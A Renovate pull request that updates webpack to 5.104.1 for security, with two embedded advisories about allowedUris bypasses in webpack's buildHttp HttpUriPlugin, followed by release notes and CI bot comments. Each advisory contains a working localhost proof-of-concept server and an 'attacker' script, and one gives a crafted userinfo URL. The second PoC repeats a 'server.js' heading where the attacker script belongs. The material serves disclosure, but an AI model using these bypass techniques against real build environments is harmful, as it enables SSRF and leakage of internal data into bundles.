chore(deps): update dependency webpack to v5.104.1 [security] by renovate[bot] · Pull Request #6614 · TanStack/router

renovate · 2026-02-08T08:02:54Z

This PR contains the following updates:

Package	Change	Age	Confidence
webpack	`5.97.1` → `5.104.1`

webpack buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistence

CVE-2025-68157 / GHSA-38r7-794h-5758

More information

Details

Summary

When experiments.buildHttp is enabled, webpack’s HTTP(S) resolver (HttpUriPlugin) enforces allowedUris only for the initial URL, but does not re-validate allowedUris after following HTTP 30x redirects. As a result, an import that appears restricted to a trusted allow-list can be redirected to HTTP(S) URLs outside the allow-list. This is a policy/allow-list bypass that enables build-time SSRF behavior (requests from the build machine to internal-only endpoints, depending on network access) and untrusted content inclusion in build outputs (redirected content is treated as module source and bundled). In my reproduction, the internal response is also persisted in the buildHttp cache.

Details

In the HTTP scheme resolver, the allow-list check (allowedUris) is performed when metadata/info is created for the original request (via getInfo()), but the content-fetch path follows redirects by resolving the Location URL without re-checking whether the redirected URL is within allowedUris.

Practical consequence: if an “allowed” host/path can return a 302 (or has an open redirect), it can point to an external URL or an internal-only URL (SSRF). The redirected response is consumed as module content, bundled, and can be cached. If the redirect target is attacker-controlled, this can potentially result in attacker-controlled JavaScript being bundled and later executed when the resulting bundle runs.

Figure 1 (evidence screenshot): left pane shows the allowed host issuing a 302 redirect to http://127.0.0.1:9100/secret.js; right pane shows the build output confirming allow-list bypass and that the secret appears in the bundle and buildHttp cache.

PoC

This PoC is intentionally constrained to 127.0.0.1 (localhost-only “internal service”) to demonstrate SSRF behavior safely.

1) Setup

mkdir split-ssrf-poc && cd split-ssrf-poc
npm init -y
npm i -D webpack webpack-cli

2) Create server.js

#!/usr/bin/env node
"use strict";

const http = require("http");
const url = require("url");

const allowedPort = 9000;
const internalPort = 9100;

const internalUrlDefault = `http://127.0.0.1:${internalPort}/secret.js`;
const secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`;
const internalPayload =
  `export const secret = ${JSON.stringify(secret)};\n` +
  `export default "ok";\n`;

function start(port, handler) {
  return new Promise(resolve => {
    const s = http.createServer(handler);
    s.listen(port, "127.0.0.1", () => resolve(s));
  });
}

(async () => {
  // Internal-only service (SSRF target)
  await start(internalPort, (req, res) => {
    if (req.url === "/secret.js") {
      res.statusCode = 200;
      res.setHeader("Content-Type", "application/javascript; charset=utf-8");
      res.end(internalPayload);
      console.log(`[internal] 200 /secret.js served (secret=${secret})`);
      return;
    }
    res.statusCode = 404;
    res.end("not found");
  });

  // Allowed host (redirector)
  await start(allowedPort, (req, res) => {
    const parsed = url.parse(req.url, true);

    if (parsed.pathname === "/redirect.js") {
      const to = parsed.query.to || internalUrlDefault;

      // Safety guard: only allow redirecting to localhost internal service in this PoC
      if (!to.startsWith(`http://127.0.0.1:${internalPort}/`)) {
        res.statusCode = 400;
        res.end("to must be internal-only in this PoC");
        console.log(`[allowed] blocked redirect to: ${to}`);
        return;
      }

      res.statusCode = 302;
      res.setHeader("Location", to);
      res.end("redirecting");
      console.log(`[allowed] 302 /redirect.js -> ${to}`);
      return;
    }

    res.statusCode = 404;
    res.end("not found");
  });

  console.log(`\nServer running:`);
  console.log(`- allowed host:  http://127.0.0.1:${allowedPort}/redirect.js`);
  console.log(`- internal-only: http://127.0.0.1:${internalPort}/secret.js`);
})();

3) Create attacker.js

#!/usr/bin/env node
"use strict";

const path = require("path");
const os = require("os");
const fs = require("fs/promises");
const webpack = require("webpack");
const webpackPkg = require("webpack/package.json");

const allowedPort = 9000;
const internalPort = 9100;

const allowedBase = `http://127.0.0.1:${allowedPort}/`;
const internalTarget = `http://127.0.0.1:${internalPort}/secret.js`;
const entryUrl = `${allowedBase}redirect.js?to=${encodeURIComponent(internalTarget)}`;

async function walk(dir) {
  const out = [];
  const items = await fs.readdir(dir, { withFileTypes: true });
  for (const it of items) {
    const p = path.join(dir, it.name);
    if (it.isDirectory()) out.push(...await walk(p));
    else if (it.isFile()) out.push(p);
  }
  return out;
}

async function fileContains(f, needle) {
  try {
    const buf = await fs.readFile(f);
    return buf.toString("utf8").includes(needle) || buf.toString("latin1").includes(needle);
  } catch {
    return false;
  }
}

async function findInFiles(files, needle) {
  const hits = [];
  for (const f of files) if (await fileContains(f, needle)) hits.push(f);
  return hits;
}

const fmtBool = b => (b ? "✅" : "❌");

(async () => {
  const tmp = await fs.mkdtemp(path.join(os.tmpdir(), "webpack-attacker-"));
  const srcDir = path.join(tmp, "src");
  const distDir = path.join(tmp, "dist");
  const cacheDir = path.join(tmp, ".buildHttp-cache");
  const lockfile = path.join(tmp, "webpack.lock");
  const bundlePath = path.join(distDir, "bundle.js");

  await fs.mkdir(srcDir, { recursive: true });
  await fs.mkdir(distDir, { recursive: true });

  await fs.writeFile(
    path.join(srcDir, "index.js"),
    `import { secret } from ${JSON.stringify(entryUrl)};
console.log("LEAKED_SECRET:", secret);
export default secret;
`
  );

  const config = {
    context: tmp,
    mode: "development",
    entry: "./src/index.js",
    output: { path: distDir, filename: "bundle.js" },
    experiments: {
      buildHttp: {
        allowedUris: [allowedBase],
        cacheLocation: cacheDir,
        lockfileLocation: lockfile,
        upgrade: true
      }
    }
  };

  const compiler = webpack(config);

  compiler.run(async (err, stats) => {
    try {
      if (err) throw err;

      const info = stats.toJson({ all: false, errors: true, warnings: true });
      if (stats.hasErrors()) {
        console.error(info.errors);
        process.exitCode = 1;
        return;
      }

      const bundle = await fs.readFile(bundlePath, "utf8");
      const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i);
      const secret = m ? m[0] : null;

      console.log("\n[ATTACKER RESULT]");
      console.log(`- webpack version: ${webpackPkg.version}`);
      console.log(`- node version: ${process.version}`);
      console.log(`- allowedUris: ${JSON.stringify([allowedBase])}`);
      console.log(`- imported URL (allowed only): ${entryUrl}`);
      console.log(`- temp dir: ${tmp}`);
      console.log(`- lockfile: ${lockfile}`);
      console.log(`- cacheDir: ${cacheDir}`);
      console.log(`- bundle:   ${bundlePath}`);

      if (!secret) {
        console.log("\n[SECURITY SUMMARY]");
        console.log(`- bundle contains internal secret marker: ${fmtBool(false)}`);
        return;
      }

      const lockHit = await fileContains(lockfile, secret);

      let cacheFiles = [];
      try { cacheFiles = await walk(cacheDir); } catch { cacheFiles = []; }
      const cacheHit = cacheFiles.length ? (await findInFiles(cacheFiles, secret)).length > 0 : false;

      const allTmpFiles = await walk(tmp);
      const allHits = await findInFiles(allTmpFiles, secret);

      console.log(`\n- extracted secret marker from bundle: ${secret}`);

      console.log("\n[SECURITY SUMMARY]");
      console.log(`- Redirect allow-list bypass: ${fmtBool(true)} (imported allowed URL, but internal target was fetched)`);
      console.log(`- Internal target (SSRF-like): ${internalTarget}`);
      console.log(`- EXPECTED: internal target should be BLOCKED by allowedUris`);
      console.log(`- ACTUAL: internal content treated as module and bundled`);

      console.log("\n[EVIDENCE CHECKLIST]");
      console.log(`- bundle contains secret:   ${fmtBool(true)}`);
      console.log(`- cache contains secret:    ${fmtBool(cacheHit)}`);
      console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`);

      console.log("\n[PERSISTENCE CHECK] files containing secret");
      for (const f of allHits.slice(0, 30)) console.log(`- ${f}`);
      if (allHits.length > 30) console.log(`- ... and ${allHits.length - 30} more`);
    } catch (e) {
      console.error(e);
      process.exitCode = 1;
    } finally {
      compiler.close(() => {});
    }
  });
})();

4) Run

Terminal A:

node server.js

Terminal B:

node attacker.js

5) Expected

Expected: Redirect target should be rejected if not in allowedUris (only http://127.0.0.1:9000/ is allowed).

Impact

Vulnerability class: Policy/allow-list bypass leading to SSRF behavior at build time and untrusted content inclusion in build outputs (and potentially bundling of attacker-controlled JavaScript if the redirect target is attacker-controlled).

Who is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary (to restrict remote module fetching). In such environments, an attacker who can influence imported URLs (e.g., via source contribution, dependency manipulation, or configuration) and can cause an allowed endpoint to redirect can:

trigger network requests from the build machine to internal-only services (SSRF behavior),

cause content from outside the allow-list to be bundled into build outputs,

and cause fetched responses to persist in build artifacts (e.g., buildHttp cache), increasing the risk of later exfiltration.

Severity

CVSS Score: 3.7 / 10 (Low)
Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@) leading to build-time SSRF behavior

CVE-2025-68458 / GHSA-8fgc-7cc6-rx7x

More information

Details

Summary

When experiments.buildHttp is enabled, webpack’s HTTP(S) resolver (HttpUriPlugin) can be bypassed to fetch resources from hosts outside allowedUris by using crafted URLs that include userinfo (username:password@host). If allowedUris enforcement relies on a raw string prefix check (e.g., uri.startsWith(allowed)), a URL that looks allow-listed can pass validation while the actual network request is sent to a different authority/host after URL parsing. This is a policy/allow-list bypass that enables build-time SSRF behavior (outbound requests from the build machine to internal-only endpoints, depending on network access) and untrusted content inclusion (the fetched response is treated as module source and bundled). In my reproduction, the internal response was also persisted in the buildHttp cache.

Reproduced on:

webpack version: 5.104.0
Node version: v18.19.1

Details

Root cause (high level): allowedUris validation can be performed on the raw URI string, while the actual request destination is determined later by parsing the URL (e.g., new URL(uri)), which interprets the authority as the part after @.

Example crafted URL:

http://127.0.0.1:9000@127.0.0.1:9100/secret.js

If the allow-list is ["http://127.0.0.1:9000"], then:

Raw string check:
crafted.startsWith("http://127.0.0.1:9000") → true
URL parsing (WHAT new URL() will contact):
origin → http://127.0.0.1:9100 (host/port after @)

As a result, webpack fetches http://127.0.0.1:9100/secret.js even though allowedUris only included http://127.0.0.1:9000.

Evidence from reproduction:

Server logs showed the internal-only endpoint being fetched:
- [internal] 200 /secret.js served (...) (observed multiple times)
Attacker-side build output showed:
- the internal secret marker was present in the bundle
- the internal secret marker was present in the buildHttp cache

PoC

This PoC is intentionally constrained to 127.0.0.1 (localhost-only “internal service”) to demonstrate SSRF behavior safely.

1) Setup

mkdir split-userinfo-poc && cd split-userinfo-poc
npm init -y
npm i -D webpack webpack-cli

2) Create server.js

#!/usr/bin/env node
"use strict";

const http = require("http");

const ALLOWED_PORT = 9000;   // allowlisted-looking host
const INTERNAL_PORT = 9100;  // actual target if bypass succeeds

const secret = `INTERNAL_ONLY_SECRET_${Math.random().toString(16).slice(2)}`;
const internalPayload =
  `// internal-only\n` +
  `export const secret = ${JSON.stringify(secret)};\n` +
  `export default "ok";\n`;

function listen(port, handler) {
  return new Promise(resolve => {
    const s = http.createServer(handler);
    s.listen(port, "127.0.0.1", () => resolve(s));
  });
}

(async () => {
  // "Allowed" host (should NOT be contacted if bypass works as intended)
  await listen(ALLOWED_PORT, (req, res) => {
    console.log(`[allowed-host] ${req.method} ${req.url} (should NOT be hit in userinfo bypass)`);
    res.statusCode = 200;
    res.setHeader("Content-Type", "application/javascript; charset=utf-8");
    res.end(`export default "ALLOWED_HOST_WAS_HIT_UNEXPECTEDLY";\n`);
  });

  // Internal-only service (SSRF-like target)
  await listen(INTERNAL_PORT, (req, res) => {
    if (req.url === "/secret.js") {
      console.log(`[internal] 200 /secret.js served (secret=${secret})`);
      res.statusCode = 200;
      res.setHeader("Content-Type", "application/javascript; charset=utf-8");
      res.end(internalPayload);
      return;
    }
    console.log(`[internal] 404 ${req.method} ${req.url}`);
    res.statusCode = 404;
    res.end("not found");
  });

  console.log("\nServers up:");
  console.log(`- allowed-host (should NOT be contacted): http://127.0.0.1:${ALLOWED_PORT}/`);
  console.log(`- internal target (should be contacted if vulnerable): http://127.0.0.1:${INTERNAL_PORT}/secret.js`);
})();

2) Create server.js

#!/usr/bin/env node
"use strict";

const path = require("path");
const os = require("os");
const fs = require("fs/promises");
const webpack = require("webpack");

function fmtBool(b) { return b ? "✅" : "❌"; }

async function walk(dir) {
  const out = [];
  let items;
  try { items = await fs.readdir(dir, { withFileTypes: true }); }
  catch { return out; }
  for (const it of items) {
    const p = path.join(dir, it.name);
    if (it.isDirectory()) out.push(...await walk(p));
    else if (it.isFile()) out.push(p);
  }
  return out;
}

async function fileContains(f, needle) {
  try {
    const buf = await fs.readFile(f);
    const s1 = buf.toString("utf8");
    if (s1.includes(needle)) return true;
    const s2 = buf.toString("latin1");
    return s2.includes(needle);
  } catch {
    return false;
  }
}

(async () => {
  const webpackVersion = require("webpack/package.json").version;

  const ALLOWED_PORT = 9000;
  const INTERNAL_PORT = 9100;

  // NOTE: allowlist is intentionally specified without a trailing slash
  // to demonstrate the risk of raw string prefix checks.
  const allowedUri = `http://127.0.0.1:${ALLOWED_PORT}`;

  // Crafted URL using userinfo so that:
  // - The string begins with allowedUri
  // - The actual authority (host:port) after '@&#8203;' is INTERNAL_PORT
  const crafted = `http://127.0.0.1:${ALLOWED_PORT}@&#8203;127.0.0.1:${INTERNAL_PORT}/secret.js`;
  const parsed = new URL(crafted);

  const tmp = await fs.mkdtemp(path.join(os.tmpdir(), "webpack-httpuri-userinfo-poc-"));
  const srcDir = path.join(tmp, "src");
  const distDir = path.join(tmp, "dist");
  const cacheDir = path.join(tmp, ".buildHttp-cache");
  const lockfile = path.join(tmp, "webpack.lock");
  const bundlePath = path.join(distDir, "bundle.js");

  await fs.mkdir(srcDir, { recursive: true });
  await fs.mkdir(distDir, { recursive: true });

  await fs.writeFile(
    path.join(srcDir, "index.js"),
    `import { secret } from ${JSON.stringify(crafted)};
console.log("LEAKED_SECRET:", secret);
export default secret;
`
  );

  const config = {
    context: tmp,
    mode: "development",
    entry: "./src/index.js",
    output: { path: distDir, filename: "bundle.js" },
    experiments: {
      buildHttp: {
        allowedUris: [allowedUri],
        cacheLocation: cacheDir,
        lockfileLocation: lockfile,
        upgrade: true
      }
    }
  };

  console.log("\n[ENV]");
  console.log(`- webpack version: ${webpackVersion}`);
  console.log(`- node version:    ${process.version}`);
  console.log(`- allowedUris:     ${JSON.stringify([allowedUri])}`);

  console.log("\n[CRAFTED URL]");
  console.log(`- import specifier: ${crafted}`);
  console.log(`- WHAT startsWith() sees: begins with "${allowedUri}" => ${fmtBool(crafted.startsWith(allowedUri))}`);
  console.log(`- WHAT URL() parses:`);
  console.log(`  - username: ${JSON.stringify(parsed.username)} (userinfo)`);
  console.log(`  - password: ${JSON.stringify(parsed.password)} (userinfo)`);
  console.log(`  - hostname: ${parsed.hostname}`);
  console.log(`  - port:     ${parsed.port}`);
  console.log(`  - origin:   ${parsed.origin}`);
  console.log(`  - NOTE: request goes to origin above (host/port after @&#8203;), not to "${allowedUri}"`);

  const compiler = webpack(config);

  compiler.run(async (err, stats) => {
    try {
      if (err) throw err;
      const info = stats.toJson({ all: false, errors: true, warnings: true });

      if (stats.hasErrors()) {
        console.error("\n[WEBPACK ERRORS]");
        console.error(info.errors);
        process.exitCode = 1;
        return;
      }

      const bundle = await fs.readFile(bundlePath, "utf8");
      const m = bundle.match(/INTERNAL_ONLY_SECRET_[0-9a-f]+/i);
      const foundSecret = m ? m[0] : null;

      console.log("\n[RESULT]");
      console.log(`- temp dir:  ${tmp}`);
      console.log(`- bundle:    ${bundlePath}`);
      console.log(`- lockfile:  ${lockfile}`);
      console.log(`- cacheDir:  ${cacheDir}`);

      console.log("\n[SECURITY CHECK]");
      console.log(`- bundle contains INTERNAL_ONLY_SECRET_* : ${fmtBool(!!foundSecret)}`);

      if (foundSecret) {
        const lockHit = await fileContains(lockfile, foundSecret);

        const cacheFiles = await walk(cacheDir);
        let cacheHit = false;
        for (const f of cacheFiles) {
          if (await fileContains(f, foundSecret)) { cacheHit = true; break; }
        }

        console.log(`- lockfile contains secret: ${fmtBool(lockHit)}`);
        console.log(`- cache contains secret:    ${fmtBool(cacheHit)}`);
      }
    } catch (e) {
      console.error(e);
      process.exitCode = 1;
    } finally {
      compiler.close(() => {});
    }
  });
})();

4) Run

Terminal A:

node server.js

Terminal B:

node attacker.js

5) Expected vs Actual

Expected: The import should be blocked because the effective request destination is http://127.0.0.1:9100/secret.js, which is outside allowedUris (only http://127.0.0.1:9000 is allow-listed).

Actual: The crafted URL passes the allow-list prefix validation, webpack fetches the internal-only resource on port 9100 (confirmed by server logs), and the secret marker appears in the bundle and buildHttp cache.

Impact

Vulnerability class: Policy/allow-list bypass leading to build-time SSRF behavior and untrusted content inclusion in build outputs.

Who is impacted: Projects that enable experiments.buildHttp and rely on allowedUris as a security boundary. If an attacker can influence the imported HTTP(S) specifier (e.g., via source contribution, dependency manipulation, or configuration), they can cause outbound requests from the build environment to endpoints outside the allow-list (including internal-only services, subject to network reachability). The fetched response can be treated as module source and included in build outputs and persisted in the buildHttp cache, increasing the risk of leakage or supply-chain contamination.

Severity

CVSS Score: 3.7 / 10 (Low)
Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

Release Notes

webpack/webpack (webpack)

`v5.104.1`

Compare Source

Patch Changes

2efd21b: Reexports runtime calculation should not accessing WEBPACK_IMPORT_KEY decl with var.
c510070: Fixed a user information bypass vulnerability in the HttpUriPlugin plugin.

`v5.104.0`

Compare Source

Minor Changes

d3dd841: Use method shorthand to render module content in __webpack_modules__ object.
d3dd841: Enhance import.meta.env to support object access.
4baab4e: Optimize dependency sorting in updateParent: sort each module only once by deferring to finishUpdateParent(), and reduce traversal count in sortWithSourceOrder by caching WeakMap values upfront.
04cd530: Handle more at-rules for CSS modules.
cafae23: Added options to control the renaming of at-rules and various identifiers in CSS modules.
d3dd841: Added base64url, base62, base58, base52, base49, base36, base32 and base25 digests.
5983843: Provide a stable runtime function variable __webpack_global__.
d3dd841: Improved localIdentName hashing for CSS.

Patch Changes

22c48fb: Added module existence check for informative error message in development mode.
50689e1: Use the fully qualified class name (or export name) for [fullhash] placeholder in CSS modules.
d3dd841: Support universal lazy compilation.
d3dd841: Fixed module library export definitions when multiple runtimes.
d3dd841: Fixed CSS nesting and CSS custom properties parsing.
d3dd841: Don't write fragment from URL to filename and apply fragment to module URL.
aab1da9: Fixed bugs for css/global type.
d3dd841: Compatibility import.meta.filename and import.meta.dirname with eval devtools.
d3dd841: Handle nested __webpack_require__.
728ddb7: The speed of identifier parsing has been improved.
0f8b31b: Improve types.
d3dd841: Don't corrupt debugId injection when hidden-source-map is used.
2179fdb: Re-validate HttpUriPlugin redirects against allowedUris, restrict to http(s) and add a conservative redirect limit to prevent SSRF and untrusted content inclusion. Redirects failing policy are rejected before caching/lockfile writes.
d3dd841: Serialize HookWebpackError.
d3dd841: Added ability to use built-in properties in dotenv and define plugin.
3c4319f: Optimizing the regular expression character class by specifying ranges for runtime code.
d3dd841: Reduce collision for local indent name in CSS.
d3dd841: Remove CSS link tags when CSS imports are removed.

`v5.103.0`

Compare Source

Features

Added DotenvPlugin and top level dotenv option to enable this plugin
Added WebpackManifestPlugin
Added support the ignoreList option in devtool plugins
Allow to use custom javascript parse function
Added import.meta.env support for environment variables
Added support for import.meta.dirname and import.meta.filename
Added support import.defer() for statistical path
Handle import.meta.main
Added suport to setup named exports for JSON modules and disable usage named export for import file from "./file.json" with { type: "json" }
Added support __dirname/__filename/import.meta.dirname/import.meta.filename for universal target
[CSS] Added the exportType option with link (by default), "text" and css-style-sheet values
[CSS] Added support for composes properties

Fixes

The dependOn chunk must be loaded before the common chunk
Return to namespace import when the external request includes a specific export
No runtime extra runtime code for module libraries
Delay HMR accept dependencies to preserve import attributes
Properly handle external presets for universal target
Fixed incorrect identifier of import binding for module externals
Fixed when defer import and dynamic default export mixed
Reduce generated output when globalThis supported
Fixed loading async modules in defer import
Reexport module for default import when no used exports for systemjs library
Rename HarmonyExportDependencyParserPlugin exported id to CompatibilityPlugin tagged id
Handle __dirname and __filename for ES modules
Rename single nested __webpack_export__ and __webpack_require__ in already bundled code
[Types] webpack function type
[Types] NormalModule type
[Types] Multi compiler configuration type
[Types] Fixed regression in custom hashDigest type
[CSS] No extra runtime for initial chunk
[CSS] Fixed a lot of CSS modules bugs

`v5.102.1`

Compare Source

Fixes

Supported extends with env for browserslist
Supported JSONP fragment format for web workers.
Fixed dynamic import support in workers using browserslist.
Fixed default defer import mangling.
Fixed default import of commonjs externals for SystemJS format.
Fixed context modules to the same file with different import attributes.
Fixed typescript types.
Improved import.meta warning messages to be more clear when used directly.
[CSS] Fixed CC_UPPER_U parsing (E -> U) in tokenizer.

`v5.102.0`

Compare Source

Features

Added static analyze for dynamic imports
Added support for import file from "./file.ext" with { type: "bytes" } to get the content as Uint8Array (look at example)
Added support for import file from "./file.ext" with { type: "text" } to get the content as text (look at example)
Added the snapshot.contextModule to configure snapshots options for context modules
Added the extractSourceMap option to implement the capabilities of loading source maps by comment, you don't need source-map-loader (look at example)
The topLevelAwait experiment is now stable (you can remove experiments.topLevelAwait from your webpack.config.js)
The layers experiment is now stable (you can remove experiments.layers from your webpack.config.js)
Added function matcher support in rule options

Fixes

Fixed conflicts caused by multiple concatenate modules
Ignore import failure during HMR update with ES modules output
Keep render module order consistent
Prevent inlining modules that have this exports
Removed unused timeout attribute of script tag
Supported UMD chunk format to work in web workers
Improved CommonJs bundle to ES module library
Use es-lexer for mjs files for build dependencies
Fixed support __non_webpack_require__ for ES modules
Properly handle external modules for CSS
AssetsByChunkName included assets from chunk.auxiliaryFiles
Use createRequire only when output is ES module and target is node
Typescript types

Performance Improvements

Avoid extra calls for snapshot
A avoid extra jobs for build dependencies
Move import attributes to own dependencies

`v5.101.3`

Compare Source

Fixes

Fixed resolve execution order issue from extra await in async modules
Avoid empty block for unused statement
Collect only specific expressions for destructuring assignment

`v5.101.2`

Compare Source

Fixes

Fixed syntax error when comment is on the last line
Handle var declaration for createRequire
Distinguish free variable and tagged variable

`v5.101.1`

Compare Source

Fixes

Filter deleted assets in processAdditionalAssets hook
HMR failure in defer module
Emit assets even if invalidation occurs again
Export types for serialization and deserialization in plugins and export the ModuleFactory class
Fixed the failure export of internal function for ES module chunk format
Fixed GetChunkFilename failure caused by dependOn entry
Fixed the import of missing dependency chunks
Fixed when entry chunk depends on the runtime chunk hash
Fixed module.exports bundle to ESM library
Adjusted the time of adding a group depending on the fragment of execution time
Fixed circle dependencies when require RawModule and condition of isDeferred
Tree-shakable module library should align preconditions of allowInlineStartup

`v5.101.0`

Compare Source

Fixes

Fixed concatenate optimization for ESM that caused undefined export
Respect the output.environment.nodePrefixForCoreModules option everywhere
Respect the output.importMetaName option everywhere
Fixed await async dependencies when accepting them during HMR
Better typescript types

Features

Added colors helpers for CLI
Enable tree-shaking for ESM external modules with named imports
Added the deferImport option to parser options

Performance Improvements

Fixed a regression in module concatenation after implementing deferred import support
Fixed a potential performance issue in CleanPlugin
Avoid extra require in some places

`v5.100.2`

Compare Source

Fixes

Keep consistent CSS order
Dependency without the source order attribute must keep their original index
Keep module traversal consistent across reexport scenarios

Performance Improvements

Extend importPhasesPlugin only when enable deferImport (#19689)

`v5.100.1`

Compare Source

Fixes

Tree-shaking unused ignored modules
[Types] Compatibility with old Node.js versions

`v5.100.0`

Compare Source

Fixes

Fixed the case where an ES modules entry chunk depends on the runtime chunk hash
Handle function exports in webpack module wrapper
Ensure dependent chunks are imported before startup & fix duplicate export of 'default'
Generate lose closing brace when exports are unprovided
CleanPlugin doesn't unlink same file twice
Fixed unexpected error codes from fs.unlink on Windows
Typescript types

Features

HMR support for ES modules output
ES module output mode now fully supports splitChunks when external variables and runtimeChunk are not set.
Added support using keyword
Implemented tc39 Defer Module Evaluation (experiment)
Support dynamic template literals expressions for new URL(...)
Enable ES modules worker chunk loading for Node.js targets
Improved support for destructing in DefinePlugin
Added VirtualUrlPlugin to support virtual: scheme

Performance Improvements

Remove useless startup entrypoint runtime for ES modules output
Cache new URL(...) evaluate expression

`v5.99.9`

Compare Source

Fixes

HMR might fail if there are new initial chunks
Destructuring namespace import with default
Destructuring namespace import with computed-property
Generate valid code for es export generation for multiple module entries
Fixed public path issue for ES modules
Asset modules work when lazy compilation used
Eliminate unused statements in certain scenarios
Fixed regression with location and order of dependencies
Fixed typescript types

`v5.99.8`

Compare Source

Fixes

Fixed type error with latest @types/node
Fixed typescript types

`v5.99.7`

Compare Source

Fixes

Don't skip export generation for default reexport (#19463)
Fixed module library export generation for reexport (#19459)
Avoid module concatenation in child compilation for module library (#19457)
Ensure HMR recover gracefully when CSS module with error
Respect cause of any errors and errors of AggregateError in stats output
Added missing @types/json-schema in types

`v5.99.6`

Compare Source

Fixes

Respect public path for ES modules
Fixed generation of module for module library when mixing commonjs and esm modules
Always apply FlagDependencyExportsPlugin for libraries where it required
Faster logic for dead control flow
Typescript types

`v5.99.5`

Compare Source

Fixes

Control dead flow for labeled and blockless statements

`v5.99.4`

Compare Source

Fixes

Fixed terminated state for if/else

`v5.99.3`

Compare Source

Fixes

Fixed dead control flow with deep nested if/else

`v5.99.2`

Compare Source

Fixes

Dead control flow for exotic cases

`v5.99.1`

Compare Source

Fixes

Dead control flow for many cases

`v5.99.0`

Compare Source

Fixes

Fixed a lot of types
Fixed runtime error when using asset module as entrypoint and runtimeChunk
JSON generator now preserves __proto__ property
Fixed when entry module isn't executed when targeting webworker with a runtime chunk
Do not duplicate modules with import attributes and reexport
The module and module ESM libraries have been union and code generation has been improved
Use a valid output path for errored asset modules
Remove BOM from JavaScript and CSS files when loader was not used
Create export for externals for module/modern-module library
Export unprovided variables for commonjs-static library
Forward semicolons from meta.webpackAST
Use xxhash64 for cache.hashAlgorithm when experiments.futureDefaults enabled
[CSS] Fixed profiling plugin for CSS
[CSS] Avoid extra module.export output for CSS module

Features

Add dead control flow check
Handle new Worker(import.meta.url) and new Worker(new URL(import.meta.url)) syntax
Added ability to generate custom error content for generators

Performance Improvements

Fixed excessive calls of getAllReferences
Optimize loc for monomorphic inline caching

Chores

Switch on strict types for typescript

`v5.98.0`

Compare Source

Fixes

Avoid the deprecation message #19062 by @alexander-akait
Should not escape CSS local ident in JS #19060 by @JSerFeng
MF parse range not compatible with Safari #19083 by @alexander-akait
Preserve filenameTemplate in new split chunk #19104 by @henryqdineen
Use module IDs for final render order #19184 by @dmichon-msft
Strip blob: protocol when public path is auto #19199 by @alexander-akait
Respect output.charset everywhere #19202 by @alexander-akait
Node async WASM loader generation #19210 by @ashi009
Correct BuildInfo and BuildMeta type definitions #19200 by @inottn

Performance Improvements

Improve FlagDependencyExportsPlugin for large JSON by depth #19058 by @hai-x
Optimize assign-depths #19193 by @dmichon-msft
Use startsWith for matching instead of converting the string to a regex #19207 by @inottn

Chores

Bump nanoid from 3.3.7 to 3.3.8 #19063 by @dependabot
Fixed incorrect typecast in DefaultStatsFactoryPlugin #19156 by @Andarist
Improved readme.md by adding video links for understanding webpack #19101 by @Vansh5632
Typo fix #19205 by @hai-x
Adopt the new webpack governance model #18804 by @ovflowd

Features

Implement /* webpackIgnore: true */ for require.resolve #19201 by @alexander-akait

Continuous Integration

CI fix #19196 by @alexander-akait

New Contributors

@Andarist made their first contribution in #19156
@Vansh5632 made their first contribution in #19101
@ashi009 made their first contribution in #19210
@ovflowd made their first contribution in #18804

Full Changelog: webpack/webpack@v5.97.1...v5.98.0

Configuration

📅 Schedule: (UTC)

Branch creation
- ""
Automerge
- At any time (no schedule defined)

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

coderabbitai · 2026-02-08T08:03:05Z

Important

Review skipped

Review was skipped due to path filters

⛔ Files ignored due to path filters (1)

pnpm-lock.yaml is excluded by !**/pnpm-lock.yaml

CodeRabbit blocks several paths by default. You can override this behavior by explicitly including those paths in the path filters. For example, including **/dist/** will override the default block on the dist directory, by removing the pattern from both the lists.

⚙️ Run configuration

Configuration used: defaults

Review profile: CHILL

Plan: Pro

Run ID: 1a7a799d-8a80-4e67-92ec-cf8a68a85c29

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

Use the checkbox below for a quick retry:

🔍 Trigger review

✨ Finishing Touches

🧪 Generate unit tests (beta)

Create PR with unit tests
Commit unit tests in branch renovate/npm-webpack-vulnerability

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

nx-cloud · 2026-02-08T08:03:25Z

View your CI Pipeline Execution ↗ for commit db2d17c

Command	Status	Duration	Result
`nx affected --targets=test:eslint,test:unit,tes...`	❌ Failed	4m 37s	View ↗
`nx run-many --target=build --exclude=examples/*...`	❌ Failed	9s	View ↗

☁️ Nx Cloud last updated this comment at 2026-05-05 00:34:42 UTC

github-actions · 2026-04-16T05:44:54Z

🚀 Changeset Version Preview

No changeset entries found. Merging this PR will not cause a version bump for any packages.

nx-cloud

Important

At least one additional CI pipeline execution has run since the conclusion below was written and it may no longer be applicable.

Nx Cloud has identified a possible root cause for your failed CI:

We identified that the failing CI tasks (@tanstack/eslint-plugin-start:build and @tanstack/eslint-plugin-router:build) are caused by pre-existing TypeScript type compatibility issues unrelated to this webpack security update. The same failures were confirmed to exist in an independent branch (6508), ruling out this PR as the root cause. No changes are needed here — these failures should be addressed separately.

No code changes were suggested for this issue.

Trigger a rerun:

Uh oh!

Conversation

renovate Bot commented Feb 8, 2026 • edited Loading Uh oh! There was an error while loading. Please reload this page.

Uh oh!

webpack buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistence

Details

Summary

Details

PoC

1) Setup

2) Create server.js

3) Create attacker.js

4) Run

5) Expected

Impact

Severity

References

webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@​) leading to build-time SSRF behavior

Details

Summary

Details

PoC

1) Setup

2) Create server.js

2) Create server.js

4) Run

5) Expected vs Actual

Impact

Severity

References

Release Notes

Patch Changes

Minor Changes

Patch Changes

Features

